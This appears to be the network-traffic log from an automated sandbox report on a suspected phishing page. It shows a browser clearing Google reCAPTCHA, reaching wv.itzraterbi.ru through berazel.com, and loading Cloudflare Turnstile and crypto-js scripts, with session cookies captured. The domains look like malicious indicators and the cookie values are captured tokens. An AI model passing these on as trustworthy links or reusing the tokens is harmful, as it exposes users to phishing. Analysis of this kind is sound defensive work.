    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA7FMEkEn3AsWDGstm5iD-gQyEvUqp0J___l-WGFyY0VXkDveTeNkvyu6jh75ui6OGd0VXh6MwnUXut8I0Rgbf4I0qHOG5EnlD5L3GT_T6b7PsVKiYN3CqXDjyZJkAW3d-Q7IZ5oIAJrq3C1DHUCmtIDFSvEUp7I_zC6sOKjpcxK7WTsgZ6uaFatqn7MORfxornuDTxQ&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=61c71c20d51b4542 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA4zoaFDNqO6EzovS0z4d28jooK4dChq1FVzINjqws77O5XliAiRm6JwAXJIelvyPaGA7eyHEScZ9B-2Dt4fZCirlp1hgSqfhqjExzgZHyhA1pkWUqTxGRIt7UmGqcBJiJ7SX6HXfXTtlRXPSEBLBuGHTqFUCB0V5kKhRcw4srZx1LAMU3_TJaeV0lty1k1XFUaro2-L&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=cbb98b901b4c82b5 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/replaceimage?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA7FMEkEn3AsWDGstm5iD-gQyEvUqp0J___l-WGFyY0VXkDveTeNkvyu6jh75ui6OGd0VXh6MwnUXut8I0Rgbf4I0qHOG5EnlD5L3GT_T6b7PsVKiYN3CqXDjyZJkAW3d-Q7IZ5oIAJrq3C1DHUCmtIDFSvEUp7I_zC6sOKjpcxK7WTsgZ6uaFatqn7MORfxornuDTxQ&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=61c71c20d51b4542 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/replaceimage?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA4R_QY_jWM4psKCppaabuXLr6uHjmT8p8DHLe7zlxgQhMhGXlyUAf7OUlRaZD0LXikMxTybgvRbG1HsedWOw_qSDAE7Ipm-6OfTAePeERiks09k6k-s-PD_Xs_tthF-q7_DPoOyp4Zv6taXhVz6NiIW5Ma3eapxc3I0OnxkhpGvNdVsOC4hM9P9vnNScmNCX1XUa5sb&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=101b83b365ac88f4 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA4R_QY_jWM4psKCppaabuXLr6uHjmT8p8DHLe7zlxgQhMhGXlyUAf7OUlRaZD0LXikMxTybgvRbG1HsedWOw_qSDAE7Ipm-6OfTAePeERiks09k6k-s-PD_Xs_tthF-q7_DPoOyp4Zv6taXhVz6NiIW5Ma3eapxc3I0OnxkhpGvNdVsOC4hM9P9vnNScmNCX1XUa5sb&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=101b83b365ac88f4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA66jB7Squ_efAQ1wl69XvRCJnpngzp_HWY6p3QFWdpg9CSxF6n8e9Vd_f3cJlGjPL8O_bkiSrZ7aG8CyOoTTaO-BMrEv1mTwgfYMQg5KpsEHcwT5DN8II4CvzDez8m-ComcFHSSGm8wYXoICd6Wc3d4nwC2Jw1qKll4aNf78GGwJDKE66wVBQMV-eZZAlJBg24rXajW&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=23ea9996fd440bbf HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/replaceimage?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA66jB7Squ_efAQ1wl69XvRCJnpngzp_HWY6p3QFWdpg9CSxF6n8e9Vd_f3cJlGjPL8O_bkiSrZ7aG8CyOoTTaO-BMrEv1mTwgfYMQg5KpsEHcwT5DN8II4CvzDez8m-ComcFHSSGm8wYXoICd6Wc3d4nwC2Jw1qKll4aNf78GGwJDKE66wVBQMV-eZZAlJBg24rXajW&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=23ea9996fd440bbf HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
    Source: global trafficHTTP traffic detected: GET /recaptcha/api2/userverify?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
    Source: global trafficHTTP traffic detected: GET /xxABW/ HTTP/1.1Host: wv.itzraterbi.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://berazel.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wv.itzraterbi.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wv.itzraterbi.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wv.itzraterbi.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wv.itzraterbi.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5cyl9/0x4AAAAAAA1mMrsCS61Fknnw/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://wv.itzraterbi.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f48a7cc7ace41d9&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5cyl9/0x4AAAAAAA1mMrsCS61Fknnw/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5cyl9/0x4AAAAAAA1mMrsCS61Fknnw/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wv.itzraterbi.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wv.itzraterbi.ru/xxABW/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImtvdXFKMjV0M3JubDhvay9VTFZyL1E9PSIsInZhbHVlIjoidGNlTjZqUTFPS1BiNUdYWnNFbmFjQXdFNDhJUk9mMm50c1RrMFNWN2NuVXM3SmhxQmVGNlVhRHdWWExkc1BXOSs5eEhLbEdOUGQ3UHB0S2hlYWtJRGZ1aUtDRmhnbTFDM044cDQrMXhxYXh2SUhQcXNwVGxwWHJFQXhTVGlKajgiLCJtYWMiOiI4MTFiNWZiYTc5OGVmNzllMDYzODI1YjA2MzM0ODljMjE1OGZkNGZiNTY5ZDFkNjIwMWJjZDQyNGZlNWEyOTRlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IisyOFpKUWY0QzB2ME5sV0ZYb2NrOEE9PSIsInZhbHVlIjoiSEFHWUhhQmhZdDFNNHRaSHVONWU2M1ZTSFJtaXFKbWR3MHRreHJ3ZmRWeHh6cUJhRitOTjcvODAxWGZXTk91RmJuN3FhamFUQzNBMEpNcThMNVB2TE5tblROUXFGNTExTC9ZTEtEajNEc2VDMWJ0VUN5V0k5NzB1Z1RveVh5YVMiLCJtYWMiOiJjOWZkMjA5YTEyYWUzNGE1ZDE1ODUxMWYyMTJkOGE2NDM2Njk4MDMwN2UzNzI1ZmI3NGU1YzlhYzJlYzdiZDI5IiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f48a7cc7ace41d9&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2106713247:1734621222:Ju1S4rINYs2w6jhaMJAc6wI0nSHHPD5uYn3o5b92WHs/8f48a7cc7ace41d9/.H3W3k_QuubbPTTWkYw5VKDIKNmMDBqT.SjUBhnSxnM-1734624549-1.1.1.1-Nr6MbTJA2B5hNY5I5gYF2L0m47RDXC_3R6cVJGZX96s5UAuGLPsnAnpIY.IFyYCK HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f48a7cc7ace41d9/1734624554139/28f5dfd92c7a87d8b384f9284867ff6c9c89fbcf047d033749d17a32e7b13ad4/u-dMlLpykfFXl6l HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5cyl9/0x4AAAAAAA1mMrsCS61Fknnw/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f48a7cc7ace41d9/1734624554141/BQm20Mq890_P8mZ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5cyl9/0x4AAAAAAA1mMrsCS61Fknnw/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f48a7cc7ace41d9/1734624554141/BQm20Mq890_P8mZ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2106713247:1734621222:Ju1S4rINYs2w6jhaMJAc6wI0nSHHPD5uYn3o5b92WHs/8f48a7cc7ace41d9/.H3W3k_QuubbPTTWkYw5VKDIKNmMDBqT.SjUBhnSxnM-1734624549-1.1.1.1-Nr6MbTJA2B5hNY5I5gYF2L0m47RDXC_3R6cVJGZX96s5UAuGLPsnAnpIY.IFyYCK HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
